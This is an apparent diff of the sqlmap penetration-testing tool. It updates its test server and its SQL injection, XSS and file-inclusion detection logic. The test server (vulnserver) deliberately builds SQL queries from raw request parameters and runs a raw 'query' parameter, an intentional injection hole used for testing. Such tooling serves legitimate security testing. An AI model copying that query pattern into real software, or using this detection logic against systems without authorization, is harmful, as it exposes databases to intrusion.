DEBUG = False
if PY3:
from http.client import INTERNAL_SERVER_ERROR
@@ -83,6 +85,7 @@ class ThreadingServer(ThreadingMixIn, HTTPServer):
try:
HTTPServer.finish_request(self, *args, **kwargs)
except Exception:
if DEBUG:
traceback.print_exc()
class ReqHandler(BaseHTTPRequestHandler):
@@ -131,7 +134,7 @@ class ReqHandler(BaseHTTPRequestHandler):
self.send_header("Content-type", "text/html; charset=%s" % UNICODE_ENCODING)
self.send_header("Connection", "close")
self.end_headers()
self.wfile.write(b"<html><p><h3>GET:</h3><a href='/?id=1'>link</a></p><hr><p><h3>POST:</h3><form method='post'>ID: <input type='text' name='id'><input type='submit' value='Submit'></form></p></html>")
self.wfile.write(b"<!DOCTYPE html><html><head><title>vulnserver</title></head><body><h3>GET:</h3><a href='/?id=1'>link</a><hr><h3>POST:</h3><form method='post'>ID: <input type='text' name='id'><input type='submit' value='Submit'></form></body></html>")
else:
code, output = OK, ""
@@ -144,10 +147,15 @@ class ReqHandler(BaseHTTPRequestHandler):
if "query" in self.params:
_cursor.execute(self.params["query"])
elif "id" in self.params:
if "base64" in self.params:
_cursor.execute("SELECT * FROM users WHERE id=%s LIMIT 0, 1" % base64.b64decode("%s===" % self.params["id"], altchars=self.params.get("altchars")).decode())
else:
_cursor.execute("SELECT * FROM users WHERE id=%s LIMIT 0, 1" % self.params["id"])
results = _cursor.fetchall()
output += "<b>SQL results:</b>\n"
output += "<b>SQL results:</b><br>\n"
if results:
output += "<table border=\"1\">\n"
for row in results:
@@ -157,6 +165,9 @@ class ReqHandler(BaseHTTPRequestHandler):
output += "</tr>\n"
output += "</table>\n"
else:
output += "no results found"
output += "</body></html>"
except Exception as ex:
code = INTERNAL_SERVER_ERROR
@@ -221,7 +232,7 @@ def run(address=LISTEN_ADDRESS, port=LISTEN_PORT):
global _server
try:
_server = ThreadingServer((address, port), ReqHandler)
print("[i] running HTTP server at '%s:%d'" % (address, port))
print("[i] running HTTP server at 'http://%s:%d'" % (address, port))
_server.serve_forever()
except KeyboardInterrupt:
_server.socket.close()

2
lib/__init__.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

2
lib/controller/__init__.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

4
lib/controller/action.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -54,6 +54,8 @@ def action():
conf.dumper.singleString(conf.dbmsHandler.getFingerprint())
kb.fingerprinted = True
# Enumeration options
if conf.getBanner:
conf.dumper.banner(conf.dbmsHandler.getBanner())

60
lib/controller/checks.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -30,6 +30,7 @@ from lib.core.common import getSortedInjectionTests
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import intersect
from lib.core.common import isDigit
from lib.core.common import joinValue
from lib.core.common import listToStrValue
from lib.core.common import parseFilePaths
@@ -117,7 +118,7 @@ def checkSqlInjection(place, parameter, value):
threadData = getCurrentThreadData()
# Favoring non-string specific boundaries in case of digit-like parameter values
if value.isdigit():
if isDigit(value):
kb.cache.intBoundaries = kb.cache.intBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: any(_ in (boundary.prefix or "") or _ in (boundary.suffix or "") for _ in ('"', '\'')))
boundaries = kb.cache.intBoundaries
elif value.isalpha():
@@ -226,8 +227,8 @@ def checkSqlInjection(place, parameter, value):
# Skip test if the user's wants to test only for a specific
# technique
if conf.technique and isinstance(conf.technique, list) and stype not in conf.technique:
debugMsg = "skipping test '%s' because the user " % title
debugMsg += "specified to test only for "
debugMsg = "skipping test '%s' because user " % title
debugMsg += "specified testing of only "
debugMsg += "%s techniques" % " & ".join(PAYLOAD.SQLINJECTION[_] for _ in conf.technique)
logger.debug(debugMsg)
continue
@@ -501,12 +502,13 @@ def checkSqlInjection(place, parameter, value):
# Useful to set kb.matchRatio at first based on False response content
kb.matchRatio = None
kb.negativeLogic = (where == PAYLOAD.WHERE.NEGATIVE)
suggestion = None
Request.queryPage(genCmpPayload(), place, raise404=False)
falsePage, falseHeaders, falseCode = threadData.lastComparisonPage or "", threadData.lastComparisonHeaders, threadData.lastComparisonCode
falseRawResponse = "%s%s" % (falseHeaders, falsePage)
# Checking if there is difference between current FALSE, original and heuristics page (i.e. not used parameter)
if not kb.negativeLogic:
if not any((kb.negativeLogic, conf.string, conf.notString)):
try:
ratio = 1.0
seqMatcher = getCurrentThreadData().seqMatcher
@@ -568,7 +570,7 @@ def checkSqlInjection(place, parameter, value):
candidates = sorted(candidates, key=len)
for candidate in candidates:
if re.match(r"\A[\w.,! ]+\Z", candidate) and ' ' in candidate and candidate.strip() and len(candidate) > CANDIDATE_SENTENCE_MIN_LENGTH:
conf.string = candidate
suggestion = conf.string = candidate
injectable = True
infoMsg = "%sparameter '%s' appears to be '%s' injectable (with --string=\"%s\")" % ("%s " % paramType if paramType != parameter else "", parameter, title, repr(conf.string).lstrip('u').strip("'"))
@@ -579,7 +581,7 @@ def checkSqlInjection(place, parameter, value):
if injectable:
if kb.pageStable and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
if all((falseCode, trueCode)) and falseCode != trueCode:
conf.code = trueCode
suggestion = conf.code = trueCode
infoMsg = "%sparameter '%s' appears to be '%s' injectable (with --code=%d)" % ("%s " % paramType if paramType != parameter else "", parameter, title, conf.code)
logger.info(infoMsg)
@@ -604,7 +606,7 @@ def checkSqlInjection(place, parameter, value):
if re.match(r"\A\w{2,}\Z", candidate): # Note: length of 1 (e.g. --string=5) could cause trouble, especially in error message pages with partially reflected payload content
break
conf.string = candidate
suggestion = conf.string = candidate
infoMsg = "%sparameter '%s' appears to be '%s' injectable (with --string=\"%s\")" % ("%s " % paramType if paramType != parameter else "", parameter, title, repr(conf.string).lstrip('u').strip("'"))
logger.info(infoMsg)
@@ -618,12 +620,12 @@ def checkSqlInjection(place, parameter, value):
if re.match(r"\A\w+\Z", candidate):
break
conf.notString = candidate
suggestion = conf.notString = candidate
infoMsg = "%sparameter '%s' appears to be '%s' injectable (with --not-string=\"%s\")" % ("%s " % paramType if paramType != parameter else "", parameter, title, repr(conf.notString).lstrip('u').strip("'"))
logger.info(infoMsg)
if not any((conf.string, conf.notString, conf.code)):
if not suggestion:
infoMsg = "%sparameter '%s' appears to be '%s' injectable " % ("%s " % paramType if paramType != parameter else "", parameter, title)
singleTimeLogMessage(infoMsg)
@@ -650,7 +652,7 @@ def checkSqlInjection(place, parameter, value):
except SqlmapConnectionException as ex:
debugMsg = "problem occurred most likely because the "
debugMsg += "server hasn't recovered as expected from the "
debugMsg += "error-based payload used ('%s')" % getSafeExString(ex)
debugMsg += "used error-based payload ('%s')" % getSafeExString(ex)
logger.debug(debugMsg)
# In case of time-based blind or stacked queries
@@ -854,7 +856,9 @@ def checkSqlInjection(place, parameter, value):
logger.warn(warnMsg)
if not checkFalsePositives(injection):
if conf.hostname in kb.vulnHosts:
kb.vulnHosts.remove(conf.hostname)
if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes:
injection.notes.append(NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE)
@@ -875,8 +879,12 @@ def heuristicCheckDbms(injection):
to identify with a simple DBMS specific boolean-based test what the DBMS
may be
"""
retVal = False
if conf.skipHeuristics:
return retVal
pushValue(kb.injection)
kb.injection = injection
@@ -885,11 +893,15 @@ def heuristicCheckDbms(injection):
Backend.forceDbms(dbms)
if (randStr1 in unescaper.escape("'%s'" % randStr1)) and list(FROM_DUMMY_TABLE.values()).count(FROM_DUMMY_TABLE.get(dbms, "")) != 1:
continue
if dbms in HEURISTIC_NULL_EVAL:
result = checkBooleanExpression("(SELECT %s%s) IS NULL" % (HEURISTIC_NULL_EVAL[dbms], FROM_DUMMY_TABLE.get(dbms, "")))
elif not ((randStr1 in unescaper.escape("'%s'" % randStr1)) and list(FROM_DUMMY_TABLE.values()).count(FROM_DUMMY_TABLE.get(dbms, "")) != 1):
result = checkBooleanExpression("(SELECT '%s'%s)=%s%s%s" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), SINGLE_QUOTE_MARKER, randStr1, SINGLE_QUOTE_MARKER))
else:
result = False
if checkBooleanExpression("(SELECT '%s'%s)=%s%s%s" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), SINGLE_QUOTE_MARKER, randStr1, SINGLE_QUOTE_MARKER)):
if dbms in HEURISTIC_NULL_EVAL and checkBooleanExpression("(SELECT %s%s) IS NULL" % (HEURISTIC_NULL_EVAL[dbms], FROM_DUMMY_TABLE.get(dbms, ""))) or not checkBooleanExpression("(SELECT '%s'%s)=%s%s%s" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), SINGLE_QUOTE_MARKER, randStr2, SINGLE_QUOTE_MARKER)):
if result:
if not checkBooleanExpression("(SELECT '%s'%s)=%s%s%s" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), SINGLE_QUOTE_MARKER, randStr2, SINGLE_QUOTE_MARKER)):
retVal = dbms
break
@@ -935,6 +947,9 @@ def checkFalsePositives(injection):
if conf.string and any(conf.string in getUnicode(_) for _ in (randInt1, randInt2, randInt3)):
continue
if conf.notString and any(conf.notString in getUnicode(_) for _ in (randInt1, randInt2, randInt3)):
continue
if randInt3 > randInt2 > randInt1:
break
@@ -1023,6 +1038,9 @@ def checkFilteredChars(injection):
kb.injection = popValue()
def heuristicCheckSqlInjection(place, parameter):
if conf.skipHeuristics:
return None
if kb.heavilyDynamic:
debugMsg = "heuristic check skipped because of heavy dynamicity"
logger.debug(debugMsg)
@@ -1119,14 +1137,22 @@ def heuristicCheckSqlInjection(place, parameter):
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
if value.lower() in (page or "").lower():
# Reference: https://bugs.python.org/issue18183
if value.upper() in (page or "").upper():
infoMsg = "heuristic (XSS) test shows that %sparameter '%s' might be vulnerable to cross-site scripting (XSS) attacks" % ("%s " % paramType if paramType != parameter else "", parameter)
logger.info(infoMsg)
if conf.beep:
beep()
for match in re.finditer(FI_ERROR_REGEX, page or ""):
if randStr1.lower() in match.group(0).lower():
infoMsg = "heuristic (FI) test shows that %sparameter '%s' might be vulnerable to file inclusion (FI) attacks" % ("%s " % paramType if paramType != parameter else "", parameter)
logger.info(infoMsg)
if conf.beep:
beep()
break
kb.disableHtmlDecoding = False
@@ -1573,7 +1599,7 @@ def checkConnection(suppressOutput=False):
kb.originalPage = kb.pageTemplate = threadData.lastPage
kb.originalCode = threadData.lastCode
if conf.cj and not conf.cookie and not conf.dropSetCookie:
if conf.cj and not conf.cookie and not any(_[0] == HTTP_HEADER.COOKIE for _ in conf.httpHeaders) and not conf.dropSetCookie:
candidate = DEFAULT_COOKIE_DELIMITER.join("%s=%s" % (_.name, _.value) for _ in conf.cj)
message = "you have not declared cookie(s), while "

Some files were not shown because too many files have changed in this diff Show More